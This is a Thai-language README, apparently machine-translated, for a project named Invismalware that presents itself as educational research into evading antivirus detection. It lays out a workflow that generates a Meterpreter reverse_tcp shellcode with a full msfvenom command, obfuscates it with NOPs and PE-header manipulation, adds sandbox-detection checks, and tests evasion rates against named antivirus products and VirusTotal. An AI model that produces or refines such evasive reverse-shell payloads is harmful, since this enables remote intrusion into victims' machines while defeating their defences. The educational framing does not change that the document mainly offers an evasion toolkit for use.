Invismalware: เทคนิคการหลีกเลี่ยงมัลแวร์ขั้นสูง
สารบัญ
- การแนะนำ
- คุณสมบัติ
- การติดตั้ง
- การใช้งาน
- วิธีการทดลอง
- การทดสอบ
- การบริจาค
- ใบอนุญาต
การแนะนำ
Invismalware เป็นโครงการที่ออกแบบมาเพื่อแสดงให้เห็นถึงเทคนิคการหลีกเลี่ยงมัลแวร์ขั้นสูงที่ข้ามการตรวจจับไวรัส การทดลองมัลแวร์ที่ขับเคลื่อนด้วยการวิจัยนี้มุ่งเน้นไปที่การใช้วิธีการทำให้งงงวยเช่นการปรับเปลี่ยนรหัสและกลยุทธ์ต่อต้านแซนด์บ็อกซ์เพื่อหลีกเลี่ยงการตรวจจับมัลแวร์แบบคงที่และแบบไดนามิก
โครงการนี้มี วัตถุประสงค์เพื่อการศึกษา เท่านั้นโดยมีวัตถุประสงค์เพื่อให้ข้อมูลเชิงลึกเกี่ยวกับกลยุทธ์การป้องกันมัลแวร์สมัยใหม่โดยการเรียนรู้จากเทคนิคการหลีกเลี่ยงที่นักแสดงที่เป็นอันตรายใช้
คุณสมบัติ
- การสร้าง ShellCode : สร้าง Payloads เชลล์ย้อนกลับแบบย้อนกลับที่กำหนดเองโดยใช้ MSFVENOM
- การทำให้งงงวยรหัส : แก้ไขรหัสมัลแวร์เพื่อหลบเลี่ยงการตรวจจับไวรัสโดยการเพิ่ม NOPs การจัดการส่วนหัว PE และอื่น ๆ
- การวิเคราะห์ต่อต้าน Dynamic : รวมถึงการตรวจสอบเพื่อตรวจจับสภาพแวดล้อมของ Sandbox เช่นไดรเวอร์เสียงและการปรากฏตัวของอุปกรณ์ USB
- การจัดการส่วนหัว PE : ปลอมตัวมัลแวร์โดยการปรับแต่งส่วนหัวแบบพกพา (PE) เพื่อหลีกเลี่ยงการตรวจจับตามลายเซ็น
- การคำนวณอัตราการหลีกเลี่ยง : วัดประสิทธิภาพของเทคนิคการหลีกเลี่ยงโดยการเปรียบเทียบผลลัพธ์ในเครื่องยนต์ป้องกันไวรัสต่างๆ
การติดตั้ง
ในการเริ่มต้นใช้งานโคลนที่เก็บและติดตั้งการพึ่งพาที่จำเป็น
ข้อกำหนดเบื้องต้น
- Python 3.x
- VirtualBox/VMware (สำหรับการทดสอบในสภาพแวดล้อมเสมือนจริง)
- Metasploit Framework (สำหรับการสร้าง ShellCode)
- PE-Bear (สำหรับการจัดการส่วนหัว PE)
โคลนที่เก็บ
git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalware
ติดตั้งการพึ่งพา
pip install -r requirements.txt
การใช้งาน
1. สร้างเชลล์มัลแวร์
ใช้ msfvenom เพื่อสร้าง Shellcode ย้อนกลับ:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= < your_ip > LPORT= < your_port > -f c > evilexp.c
2. แก้ไข ShellCode
แก้ไขไฟล์ evilexp.c เพื่อทำให้งงงวยรหัสและหลีกเลี่ยงการตรวจจับ
3. ทำงานในเครื่องเสมือน
ปรับใช้มัลแวร์ในเครื่องเสมือนที่ปลอดภัยและแยกได้เพื่อทดสอบพฤติกรรมและวัดอัตราการตรวจจับ
4. อัปโหลดไปยัง virustotal
อัปโหลดมัลแวร์ของคุณไปยัง virustotal เพื่อประเมินอัตราการหลีกเลี่ยงของมันในเครื่องยนต์ป้องกันไวรัสหลายตัว
วิธีการทดลอง
โครงการดังกล่าวเป็นไปตามวิธีการสี่ขั้นตอนเพื่อให้บรรลุการหลีกเลี่ยงมัลแวร์:
- การสร้าง ShellCode : สร้าง ShellCode ย้อนกลับพื้นฐาน
- การปรับเปลี่ยนรหัส : ทำให้งงงวย ShellCode เพื่อหลบเลี่ยงการตรวจจับ
- การวิเคราะห์ต่อต้าน Dynamic : เพิ่มการตรวจจับ Sandbox เพื่อข้ามเครื่องมือวิเคราะห์แบบไดนามิก
- การปรับเปลี่ยนส่วนหัว PE : เปลี่ยนส่วนหัว PE เพื่อทำให้ความสับสนของลายเซ็นมัลแวร์ทำให้งงงวย
การทดสอบ
การทดสอบในท้องถิ่น
เรียกใช้มัลแวร์บนเครื่องเสมือนที่ติดตั้งซอฟต์แวร์ป้องกันไวรัสเช่น Kaspersky , Windows Defender หรือ BitDefender
การทดสอบ virustotal
อัปโหลดมัลแวร์ที่แก้ไขไปยัง virustotal และตรวจสอบจำนวนเครื่องยนต์ป้องกันไวรัสที่ตรวจจับได้สำเร็จ
การบริจาค
เรายินดีต้อนรับการมีส่วนร่วมในการปรับปรุงโครงการ หากคุณต้องการมีส่วนร่วม:
- แยกที่เก็บ
- สร้างสาขาใหม่สำหรับคุณสมบัติหรือการแก้ไขข้อบกพร่องของคุณ
- ส่งคำขอดึงพร้อมข้อมูลโดยละเอียดเกี่ยวกับการเปลี่ยนแปลงของคุณ
ใบอนุญาต
โครงการนี้ได้รับใบอนุญาตภายใต้ใบอนุญาต MIT ดูไฟล์ใบอนุญาตสำหรับรายละเอียด